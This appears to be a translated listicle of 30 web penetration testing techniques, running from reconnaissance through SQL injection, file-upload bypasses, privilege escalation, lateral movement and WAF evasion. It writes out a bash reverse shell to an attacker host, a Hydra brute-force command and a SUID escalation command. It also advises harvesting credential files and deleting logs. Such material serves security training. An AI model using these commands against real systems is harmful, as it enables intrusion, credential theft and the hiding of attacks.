30 Practical Web Penetration Testing Techniques You Must Know

1. Information Gathering

Effective penetration testing starts with thorough information collection; many failures stem from incomplete reconnaissance rather than difficult vulnerabilities.

Technique 1: Subdomain Enumeration – Target Hidden Attack Surfaces

Subdomains, especially test environments, admin panels, or third‑party integrations, are often less protected. Combine OneForAll (batch enumeration) with Subfinder (quick filtering) and prioritize subdomains without CDN and with prefixes like admin/, test/, oa/, which raise the vulnerability probability by about 60%.

Tip: Add a 1‑second delay between requests to avoid IP bans, and verify whether the subdomain resolves to a different IP, indicating a separate, potentially weaker server.

Technique 2: Side‑Site Query – Uncover Hidden Targets on the Same IP

Even heavily protected main sites may share an IP with other sites. Use WebEye or online side‑site services (ensuring legal use) to list live sites on the same IP, then focus on sites with few static pages but many interactive elements such as admin panels or data query pages.

Note: Confirm ownership of the side‑site to avoid legal issues.

Technique 3: Sensitive File Leakage – Scan High‑Frequency Paths First

Common misconfigurations expose files like source code, database configs, or credentials. Prioritize checking these paths:

/robots.txt

/.git/ (use GitHack)

/.svn/

/config.php

/backup/ (look for *.sql, *.zip, *.rar)

/install.php

If a 403 response appears, try modifying headers such as Referer or User‑Agent to bypass simple restrictions.

Technique 4: Port Scanning – Focus on Non‑80/443 Ports

Standard scans miss services on ports like 8080, 8081, 8888, 3389, 22. Use nmap -sV -p- targetIP -T4 and record open ports with service versions for later exploitation (e.g., old MySQL or SSH weak passwords).

Technique 5: Whois Lookup – Reveal Target Ownership Details

Extract registrar email (useful for social‑engineering) and associated domains that may share configurations or weak credentials. Hide your own IP during queries.

Technique 6: JS File Mining – Extract Hidden Endpoints and Secrets

Search front‑end JavaScript files (Chrome F12 → Sources) for keywords like api, url, password, admin, token. These often expose undocumented APIs, test accounts, or secret parameters.

Technique 7: Fingerprinting – Identify Server Stack and Vulnerable Components

Determine OS, web container, scripting language, and CMS (e.g., WordPress, DedeCMS, EmpireCMS). Use WhatWeb for quick checks and FingerPrintHub for higher accuracy; combine results to reduce false positives.

Technique 8: DNS Information – Find DNS‑Based Vulnerabilities and Backup IPs

Run nslookup or dig to collect A, CNAME, and MX records. If zone transfer is allowed, execute dig @targetDNS targetDomain axfr to harvest all records.

2. Vulnerability Mining

The goal is precise, exploitable findings; low‑to‑medium severity bugs often yield higher success when aligned with the target’s context.

Technique 9: SQL Injection – Start with Simple Closures and Bypass Filters

Test single‑quote, double‑quote, and parenthesis closures; watch for MySQL syntax errors. Bypass filters using case‑mixing (e.g., UnIoN SeLeCt), comments ( --+, #, /* */), or URL/Unicode encoding. Prioritize login fields, id / uid parameters, and search boxes. Use sqlmap -u "targetURL?id=1" -p id --dbs after manual confirmation.

Technique 10: XSS – Test All User‑Input Points

Inject simple payloads into comments, message boards, profile fields, search boxes, and URL parameters (e.g., name, title). If filtered, try HTML entity or URL encoding. Stored XSS (e.g., in comments) offers longer‑term control.

Technique 11: File Upload – Bypass Extension, Content, and Path Checks

Three bypass dimensions:

Extension: rename .php to .php5, .phtml, change case, or add trailing spaces.

Content: append PHP code to a JPG, forge GIF headers.

Path: manipulate ../ to reach the web root if the upload path is writable.

After upload, verify the file is accessible and executable; a simple one‑line webshell is often sufficient.

Technique 12: CSRF – Exploit Missing Referer Validation

Modify the Referer header with Burp Suite to match the target domain, then embed malicious requests (e.g., password change) in an HTML page. Target high‑impact actions such as account changes or admin operations. If a CSRF token is required, obtain it first (e.g., via XSS).

Technique 13: Command Execution – Target High‑Risk Parameters

Focus on parameters like cmd, command, exec, system, shell. Test simple commands ( whoami, ipconfig, ls) and observe output. Bypass filters with spacing, Base64 encoding ( echo d2hvYW1p | base64 -d | bash), or concatenation ( whoa+mi). Use Burp Suite for bulk testing.

Technique 14: Unauthorized Access – Scan for Unprotected Back‑ends

Check for direct access to admin pages ( /admin/index.php), APIs without token checks ( /api/getuserinfo), and default credentials on third‑party tools (phpMyAdmin, phpStudy, monitoring consoles).

Technique 15: Weak Passwords – Test High‑Frequency Account/Password Pairs

Common usernames: admin, administrator, root, test, user, webmaster. Common passwords: 123456, 12345678, admin123, 1234qwer, password, or the username itself. Use

Hydra -L userlist.txt -P passlist.txt targetIP http-post-form "/login.php:username=^USER^&password=^PASS^:Login failed"

with a moderate request rate.

Technique 16: Logic Bugs – Focus on Password Reset and Privilege Abuse

Attempt to reset another user’s password by altering userid parameters or bypassing verification codes. Test URL or cookie manipulation to access admin‑only data.

Technique 17: CMS Vulnerabilities – Leverage Known Bugs and Default Configurations

Identify the CMS version via fingerprinting, then consult public vulnerability databases (e.g., DedeCMS 5.7 SQL injection, WordPress plugin flaws). Test default credentials (admin/admin, admin/123456) before custom exploits.

Technique 18: Web Container Bugs – Target Version‑Specific Flaws

After fingerprinting Apache, Nginx, or IIS versions, test known issues: Nginx < 1.16.0 path traversal, Apache old file‑include bugs, IIS6/7.5 parsing vulnerabilities.

Technique 19: API Vulnerabilities – Parameter Tampering and Unauthorized Calls

Modify request parameters (e.g., amount=0, status=1), call APIs without tokens, and brute‑force endpoints. Observe HTTP status codes: 200 = success, 401 = unauthenticated, 500 = server error.

Technique 20: Cookie/Session – Session Hijacking and Fixation

Check if cookies expose usernames or are mutable. Use XSS to steal cookies, then replay them. Test whether a session ID remains constant after login (fixation) and attempt to reuse it.

3. Privilege Escalation & Internal Pivoting

After obtaining a webshell or low‑privilege account, move to root/administrator and explore the internal network.

Technique 21: Linux Privilege Escalation – SUID Files and Cron Jobs

Find SUID binaries: find / -perm -u=s 2>/dev/null. Exploit writable SUID utilities (e.g., find / -exec bash -p ;). Review crontab -l for root‑owned jobs with writable scripts; inject malicious commands.

Technique 22: Windows Privilege Escalation – Missing Patches and Services

Run systeminfo to list missing patches, then search for known escalation exploits (e.g., MS17‑010, MS18‑0813) using Metasploit or Empire. Examine services via services.msc and schtasks /query; replace writable service binaries to gain admin rights.

Technique 23: Reverse Shell – Choose Stable, Low‑Detection Methods

Deploy a reliable reverse shell (e.g., bash -i >& /dev/tcp/attackerIP/4444 0>&1) after gaining initial foothold.

Technique 24: Internal Network Mapping – Quick Topology Sketch

Identify internal IP range ( ifconfig / ipconfig), ping sweep with nmap -sP 192.168.1.0/24, then scan live hosts for critical ports (22, 3389, 3306, 445). List shared resources with net view on Windows.

Technique 25: Lateral Movement – Exploit SMB and RDP

Use weak SMB credentials or MS17‑010 to execute commands on port 445. For RDP (3389), brute‑force or reuse weak credentials to obtain remote desktop access.

Technique 26: Sensitive Data Extraction – Focus on Configs and Credential Stores

Retrieve database dumps via compromised accounts, download server config files (e.g., nginx.conf, httpd.conf, config.php), and collect OS credential files ( /etc/shadow, Windows SAM) for offline cracking.

4. Defense Evasion & Practical Tips (Techniques 27‑30)

Technique 27: Bypass WAF – Low‑Profile Testing and Filter Evasion

Space requests by 1‑2 seconds, use case‑mixing, comments, or encoding to avoid signature detection. Route traffic through SOCKS5 proxies or VPNs to hide the source IP.

Technique 28: Hide Your Footprint – Log Cleaning and Artifact Removal

Delete logs ( /var/log, Windows Event Viewer), avoid modifying core files, and remove uploaded webshells and tools after the test.

Technique 29: Prioritization – "Easy First, Hard Later"

Start with high‑success, low‑effort issues (weak passwords, sensitive files, unauthorized access), then move to classic web bugs (SQLi, XSS, file upload), and finally tackle high‑risk or 0‑day exploits only if time permits.

Technique 30: Defensive Review – Learn from the Attack

After each engagement, analyze why each vulnerability existed, propose mitigations (input validation, patch management, default credential changes), and reflect on personal gaps to improve future assessments.

Source: HACK之道